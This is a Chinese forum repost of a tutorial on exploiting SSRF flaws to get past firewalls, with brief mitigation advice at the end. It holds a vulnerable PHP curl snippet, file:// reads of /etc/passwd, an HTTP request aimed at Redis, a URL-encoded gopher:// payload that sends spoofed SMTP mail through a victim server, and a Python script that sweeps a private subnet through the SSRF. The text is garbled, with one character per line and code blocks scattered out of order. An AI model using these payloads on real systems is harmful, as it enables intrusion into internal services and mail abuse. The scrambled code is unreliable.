论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[28912] 2021-05-04_如何绕过防火墙利用SSRF漏洞
文档创建者:
s7ckTeam
浏览次数:
2
最后更新:
2025-01-19
漏洞
2 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-58
6万
主题
-6万
回帖
-58
积分
管理员
积分
-58
发消息
2021-05-04_如何绕过防火墙利用SSRF漏洞
如
何
绕
过
防
火
墙
利
用
S
S
R
F
漏
洞
O
t
s
安
全
2
0
2
1
-
0
5
-
0
4
服
务
器
端
请
求
伪
造
也
称
为
S
S
R
F
,
是
允
许
在
本
地
服
务
器
上
读
取
文
件
的
W
e
b
漏
洞
。
请
勿
将
它
们
与
C
S
R
F
(
跨
站
请
求
伪
造
)
相
混
淆
,
后
者
旨
在
在
其
他
用
户
不
知
情
的
情
况
下
执
行
请
求
。
S
S
R
F
的
一
大
优
点
是
能
够
绕
过
防
火
墙
。
实
际
上
,
在
服
务
器
端
执
行
的
操
作
可
以
查
询
仅
在
本
地
可
用
的
服
务
,
例
如
:
N
o
S
Q
L
数
据
库
,
例
如
R
e
d
i
s
,
M
o
n
g
o
D
B
关
系
数
据
库
,
例
如
O
r
a
c
l
e
,
M
S
S
Q
L
,
M
y
S
Q
L
,
P
o
s
t
g
r
e
S
Q
L
邮
件
服
务
,
例
如
P
o
s
t
f
i
x
或
D
o
v
e
c
o
t
通
常
可
以
在
本
地
访
问
的
W
e
b
服
务
W
e
b
代
理
中
特
别
存
在
这
种
缺
陷
。
代
理
服
务
的
用
户
可
以
访
问
通
常
不
应
该
访
问
的
服
务
器
中
存
在
的
内
部
数
据
。
下
图
显
示
了
对
W
e
b
代
理
的
攻
击
示
例
,
该
攻
击
没
有
保
护
其
本
地
地
址
免
受
S
S
R
F
的
攻
击
:
在
上
面
的
示
例
中
,
我
们
注
意
到
本
地
地
址
是
在
服
务
器
端
解
析
的
,
并
允
许
攻
击
者
检
索
文
件
的
内
容
。
现
在
让
我
们
看
到
关
于
S
S
R
F
漏
洞
的
各
种
不
同
类
型
的
利
用
。
如
何
利
用
如
何
利
用
S
S
R
F
漏
洞
漏
洞
上
面
我
们
已
经
看
到
了
利
用
W
e
b
代
理
的
示
例
,
但
是
存
在
多
种
攻
击
模
式
。
W
e
b
代
理
示
例
使
用
H
T
T
P
协
议
访
问
计
算
机
上
的
内
部
数
据
。
然
后
,
我
们
有
权
问
自
己
一
个
问
题
:
“
如
何
与
其
他
服
务
(
例
如
数
据
库
,
电
子
邮
件
服
务
等
)
进
行
通
信
?
”
让
我
们
看
下
面
的
例
子
:
此
示
例
以
地
址
作
为
输
入
并
检
索
关
联
的
页
面
,
P
H
P
C
u
r
l
模
块
是
对
c
u
r
l
h
t
t
p
:
/
/
e
x
a
m
p
l
e
.
c
o
m
系
统
命
令
的
简
单
改
编
。
因
此
,
我
们
可
以
特
别
使
用
C
u
r
l
的
所
有
功
能
,
这
些
功
能
与
按
照
以
下
模
式
发
送
到
脚
本
的
地
址
的
语
义
有
关
:
[
p
r
o
t
o
c
o
l
e
]
:
/
/
[
I
P
|
U
R
L
]
:
[
p
o
r
t
]
/
[
p
a
r
a
m
]
。
使
用
的
协
议
:
H
T
T
P
,
H
T
T
P
S
,
F
T
P
,
G
O
P
H
E
R
,
F
I
L
E
,
D
I
C
T
等
.
.
.
地
址
远
端
参
数
(
如
果
需
要
)
如
果
您
需
要
有
关
C
u
r
l
实
施
的
协
议
的
更
多
信
息
,
我
们
邀
请
您
检
查
官
方
页
面
上
的
文
档
h
t
t
p
s
:
/
/
c
u
r
l
.
s
e
/
d
o
c
s
/
m
a
n
p
a
g
e
.
h
t
m
l
。
F
I
L
E
:
:
/
/
和
和
H
T
T
P
:
:
/
/
协
议
协
议
协
议
应
该
引
起
我
们
的
注
意
。
该
f
i
l
e
:
/
/
协
议
,
使
我
们
可
以
在
服
务
器
上
打
开
文
件
。
使
用
前
面
的
脚
本
,
我
们
可
以
尝
试
读
取
/
e
t
c
/
p
a
s
s
w
d
服
务
器
上
的
文
件
,
这
将
为
我
们
提
供
以
下
输
出
:
我
们
完
了
!
根
据
上
面
的
屏
幕
截
图
,
您
可
以
看
到
我
们
有
权
访
问
服
务
器
上
的
任
何
文
件
。
$
c
u
r
l
=
c
u
r
l
_
i
n
i
t
(
)
;
c
u
r
l
_
s
e
t
o
p
t
_
a
r
r
a
y
(
$
c
u
r
l
,
a
r
r
a
y
(
C
U
R
L
O
P
T
_
U
R
L
=
>
$
_
G
E
T
[
'
u
r
l
'
]
)
)
;
$
r
e
s
p
=
c
u
r
l
_
e
x
e
c
(
$
c
u
r
l
)
;
c
u
r
l
_
c
l
o
s
e
(
$
c
u
r
l
)
;
该
f
i
l
e
:
/
/
协
议
允
许
我
们
访
问
文
件
,
但
是
我
们
如
何
与
计
算
机
上
存
在
的
某
些
服
务
进
行
通
信
?
N
i
c
o
l
a
s
G
r
é
g
o
i
r
e
撰
写
的
文
章
为
我
们
提
供
了
一
些
很
好
的
S
S
R
F
示
例
,
使
我
们
能
够
利
用
R
e
d
i
s
数
据
库
服
务
。
与
M
o
n
g
o
D
B
一
样
,
R
e
d
i
s
是
默
认
情
况
下
不
进
行
身
份
验
证
的
N
o
S
Q
L
数
据
库
。
上
面
指
出
的
文
章
说
明
了
如
何
使
用
H
T
T
P
请
求
来
提
取
和
修
改
数
据
库
或
读
取
系
统
上
的
文
件
。
此
方
法
的
主
要
问
题
是
H
T
T
P
请
求
必
须
具
有
特
定
的
格
式
才
能
正
确
:
此
格
式
将
操
作
限
制
为
服
务
,
例
如
访
问
需
要
非
常
精
确
的
前
导
的
服
务
。
使
用
H
T
T
P
请
求
访
问
R
e
d
i
s
数
据
库
的
示
例
:
G
O
P
H
E
R
:
:
/
/
协
议
协
议
为
了
克
服
格
式
问
题
,
我
们
可
以
使
用
该
g
o
p
h
e
r
:
/
/
协
议
。
G
o
p
h
e
r
是
并
发
H
T
T
P
协
议
,
已
不
再
使
用
,
但
c
u
r
l
仍
然
支
持
。
这
将
使
我
们
能
够
通
过
T
e
l
n
e
t
与
发
送
电
子
邮
件
时
使
用
的
S
M
T
P
等
服
务
进
行
通
信
。
在
下
面
的
示
例
中
,
我
们
尝
试
使
用
本
地
可
用
的
S
M
T
P
服
务
器
发
送
电
子
邮
件
。
如
果
我
们
将
上
述
请
求
转
换
为
有
效
的
G
o
p
h
e
r
查
询
,
它
将
变
为
:
为
了
进
一
步
测
试
我
们
的
S
S
R
F
,
我
们
在
与
S
M
T
P
协
议
相
关
联
的
端
口
2
5
上
设
置
了
一
个
n
e
t
c
a
t
服
务
器
,
并
等
待
请
求
被
执
行
:
本
地
网
络
上
本
地
网
络
上
I
P
地
址
的
枚
举
地
址
的
枚
举
在
前
面
的
部
分
中
,
我
们
已
经
看
到
S
S
R
F
充
当
执
行
内
部
请
求
的
代
理
。
然
后
可
以
将
它
们
用
作
枚
举
可
通
过
子
网
网
络
访
问
的
计
算
机
的
工
具
。
唯
一
的
限
制
是
要
检
测
的
机
器
必
须
至
少
打
开
一
个
服
务
。
最
常
见
的
服
务
通
常
是
使
用
端
口
8
0
、
4
4
3
、
8
0
8
0
、
2
2
甚
至
是
使
用
W
i
n
d
o
w
s
系
统
上
的
端
口
3
3
8
9
的
R
D
P
的
W
e
b
或
S
S
H
服
务
。
我
们
可
以
通
过
A
p
a
c
h
e
配
置
文
件
/
e
t
c
/
a
p
a
c
h
e
2
/
a
p
a
c
h
e
2
.
c
o
n
f
或
通
过
查
看
专
用
网
络
的
I
P
地
址
范
围
来
猜
测
可
访
问
的
子
网
:
1
0
.
0
.
0
.
0
/
8
1
7
2
.
1
6
.
0
.
0
/
1
2
1
9
2
.
1
6
8
.
0
.
0
/
1
6
要
枚
举
端
口
8
0
上
具
有
H
T
T
P
服
务
的
可
用
计
算
机
,
可
以
使
用
以
下
p
y
t
h
o
n
脚
本
:
G
E
T
/
i
n
d
e
x
.
h
t
m
l
H
o
s
t
:
w
w
w
.
n
e
o
s
l
a
b
.
c
o
m
U
s
e
r
-
A
g
e
n
t
:
M
o
z
i
l
l
a
/
5
.
0
(
W
i
n
d
o
w
s
N
T
6
.
3
;
W
O
W
6
4
;
r
v
:
5
5
.
0
)
G
e
c
k
o
/
2
0
1
0
0
1
0
1
F
i
r
e
f
o
x
/
5
5
.
0
A
c
c
e
p
t
:
t
e
x
t
/
h
t
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
h
t
m
l
+
x
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
m
l
;
q
=
0
.
9
,
*
/
*
;
q
=
0
.
8
A
c
c
e
p
t
-
L
a
n
g
u
a
g
e
:
f
r
,
f
r
-
F
R
;
q
=
0
.
8
,
e
n
-
U
S
;
q
=
0
.
5
,
e
n
;
q
=
0
.
3
A
c
c
e
p
t
-
E
n
c
o
d
i
n
g
:
g
z
i
p
,
d
e
f
l
a
t
e
,
b
r
-
E
R
R
w
r
o
n
g
n
u
m
b
e
r
o
f
a
r
g
u
m
e
n
t
s
f
o
r
'
g
e
t
'
c
o
m
m
a
n
d
-
E
R
R
u
n
k
n
o
w
n
c
o
m
m
a
n
d
'
H
o
s
t
:
'
-
E
R
R
u
n
k
n
o
w
n
c
o
m
m
a
n
d
'
A
c
c
e
p
t
:
'
-
E
R
R
u
n
k
n
o
w
n
c
o
m
m
a
n
d
'
A
c
c
e
p
t
-
E
n
c
o
d
i
n
g
:
'
-
E
R
R
u
n
k
n
o
w
n
c
o
m
m
a
n
d
'
C
o
n
n
e
c
t
i
o
n
:
'
H
E
L
O
l
o
c
a
l
h
o
s
t
M
A
I
L
F
R
O
M
:
<
h
a
c
k
e
r
@
s
i
t
e
.
c
o
m
>
R
C
P
T
T
O
:
<
v
i
c
t
i
m
@
s
i
t
e
.
c
o
m
>
D
A
T
A
F
r
o
m
:
[
H
a
c
k
e
r
]
<
h
a
c
k
e
r
@
s
i
t
e
.
c
o
m
>
T
o
:
<
v
i
c
t
i
m
@
s
i
t
e
.
c
o
m
>
D
a
t
e
:
T
u
e
,
1
5
S
e
p
2
0
2
0
1
7
:
2
0
:
2
6
-
0
4
0
0
S
u
b
j
e
c
t
:
A
h
A
h
A
H
Y
o
u
d
i
d
n
o
t
s
a
y
t
h
e
m
a
g
i
c
w
o
r
d
!
.
Q
U
I
T
h
t
t
p
s
:
/
/
v
i
c
t
i
m
.
w
e
b
s
i
t
e
/
c
u
r
l
.
p
h
p
?
u
r
l
=
g
o
p
h
e
r
:
/
/
1
2
7
.
0
.
0
.
1
:
2
5
/
x
H
E
L
O
%
2
0
l
o
c
a
l
h
o
s
t
%
2
5
0
d
%
2
5
0
a
M
A
I
L
%
2
0
F
R
O
M
%
3
A
%
3
C
h
a
c
k
e
r
@
s
i
t
e
.
c
o
m
%
3
E
%
2
5
0
d
%
2
5
0
a
R
C
P
T
%
2
0
T
O
%
3
A
%
3
C
v
i
c
t
i
m
@
s
i
t
e
.
c
o
m
%
3
E
%
2
5
0
d
%
2
5
0
a
D
A
T
A
%
2
5
0
d
%
2
5
0
a
F
r
o
m
%
3
A
%
2
0
%
5
B
H
a
c
k
e
r
%
5
D
%
2
0
%
3
C
h
a
c
k
e
r
@
s
i
t
e
.
c
o
m
%
3
E
%
2
5
0
d
%
2
5
0
a
T
o
%
3
A
%
2
0
%
3
C
v
i
c
t
i
m
@
s
i
t
e
.
c
o
m
%
3
E
%
2
5
0
d
%
2
5
0
a
D
a
t
e
%
3
A
%
2
0
T
u
e
%
2
C
%
2
0
1
5
%
2
0
S
e
p
%
2
0
2
0
2
0
%
2
0
2
0
%
3
A
2
0
%
3
A
2
6
%
2
0
-
0
4
0
0
%
2
5
0
d
%
2
5
0
a
S
u
b
j
e
c
t
%
3
A
%
2
0
A
H
%
2
0
A
H
%
2
0
A
H
%
2
5
0
d
%
2
5
0
a
%
2
5
0
d
%
2
5
0
a
Y
o
u
%
2
0
d
i
d
n
%
2
7
t
%
2
0
s
a
y
%
2
0
t
h
e
%
2
0
m
a
g
i
c
%
2
0
w
o
r
d
%
2
0
%
2
1
%
2
5
0
d
%
2
5
0
a
%
2
5
0
d
%
2
5
0
a
%
2
5
0
d
%
2
5
0
a
.
%
2
5
0
d
%
2
5
0
a
Q
U
I
T
%
2
5
0
d
%
2
5
0
a
n
c
-
l
v
p
2
5
l
i
s
t
e
n
i
n
g
o
n
[
a
n
y
]
2
5
.
.
.
c
o
n
n
e
c
t
t
o
[
1
2
7
.
0
.
0
.
1
]
f
r
o
m
l
o
c
a
l
h
o
s
t
[
1
2
7
.
0
.
0
.
1
]
3
5
4
1
7
H
E
L
O
l
o
c
a
l
h
o
s
t
M
A
I
L
F
R
O
M
:
<
h
a
c
k
e
r
@
s
i
t
e
.
c
o
m
>
R
C
P
T
T
O
:
<
v
i
c
t
i
m
@
s
i
t
e
.
c
o
m
>
D
A
T
A
F
r
o
m
:
[
H
a
c
k
e
r
]
<
h
a
c
k
e
r
@
s
i
t
e
.
c
o
m
>
T
o
:
<
v
i
c
t
i
m
@
s
i
t
e
.
c
o
m
>
D
a
t
e
:
T
u
e
,
1
5
S
e
p
2
0
2
0
1
7
:
2
0
:
2
6
-
0
4
0
0
S
u
b
j
e
c
t
:
A
H
A
H
A
H
Y
o
u
d
i
d
n
o
t
s
a
y
t
h
e
m
a
g
i
c
w
o
r
d
!
.
Q
U
I
T
i
m
p
o
r
t
r
e
q
u
e
s
t
s
d
e
f
i
p
R
a
n
g
e
(
s
t
a
r
t
_
i
p
,
e
n
d
_
i
p
)
:
s
t
a
r
t
=
l
i
s
t
(
m
a
p
(
i
n
t
,
s
t
a
r
t
_
i
p
.
s
p
l
i
t
(
"
.
"
)
)
)
e
n
d
=
l
i
s
t
(
m
a
p
(
i
n
t
,
e
n
d
_
i
p
.
s
p
l
i
t
(
"
.
"
)
)
)
t
e
m
p
=
s
t
a
r
t
i
p
_
r
a
n
g
e
=
[
]
i
p
_
r
a
n
g
e
.
a
p
p
e
n
d
(
s
t
a
r
t
_
i
p
)
w
h
i
l
e
t
e
m
p
!
=
e
n
d
:
s
t
a
r
t
[
3
]
+
=
1
f
o
r
i
i
n
(
3
,
2
,
1
)
:
i
f
t
e
m
p
[
i
]
=
=
2
5
6
:
t
e
m
p
[
i
]
=
0
t
e
m
p
[
i
-
1
]
+
=
1
i
p
_
r
a
n
g
e
.
a
p
p
e
n
d
(
"
.
"
.
j
o
i
n
(
m
a
p
(
s
t
r
,
t
e
m
p
)
)
)
结
论
结
论
服
务
器
端
请
求
伪
造
是
黑
客
中
一
个
非
常
有
利
可
图
的
漏
洞
,
尤
其
是
当
您
的
业
务
基
础
架
构
位
于
云
中
时
。
为
了
使
应
用
程
序
免
受
S
S
R
F
的
漏
洞
影
响
,
您
需
要
确
保
:
用
于
仅
允
许
H
T
T
P
和
H
T
T
P
S
查
询
的
协
议
链
接
到
请
求
的
U
R
L
的
I
P
地
址
不
能
是
专
用
网
络
的
一
部
分
阅
读
原
文
r
e
t
u
r
n
i
p
_
r
a
n
g
e
i
p
_
r
a
n
g
e
=
i
p
R
a
n
g
e
(
"
1
9
2
.
1
6
8
.
0
.
0
"
,
"
1
9
2
.
1
6
8
.
2
5
5
.
2
5
5
"
)
i
p
_
u
p
=
[
]
f
o
r
i
p
i
n
i
p
_
r
a
n
g
e
:
t
r
y
:
r
e
s
u
l
t
=
r
e
q
u
e
s
t
s
.
g
e
t
(
"
h
t
t
p
:
/
/
v
i
c
t
i
m
.
w
e
b
s
i
t
e
/
c
u
r
l
.
p
h
p
?
u
r
l
=
h
t
t
p
:
/
/
"
+
i
p
+
"
/
:
8
0
"
,
t
i
m
e
o
u
t
=
0
.
5
)
.
c
o
n
t
e
n
t
i
f
(
r
e
s
u
l
t
i
s
n
o
t
"
"
)
:
i
p
_
u
p
.
a
p
p
e
n
d
(
i
p
)
p
r
i
n
t
"
[
+
]
M
a
c
h
i
n
e
:
"
+
i
p
e
x
c
e
p
t
:
p
a
s
s
p
r
i
n
t
(
"
"
.
j
o
i
n
(
i
p
_
u
p
)
)
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
漏洞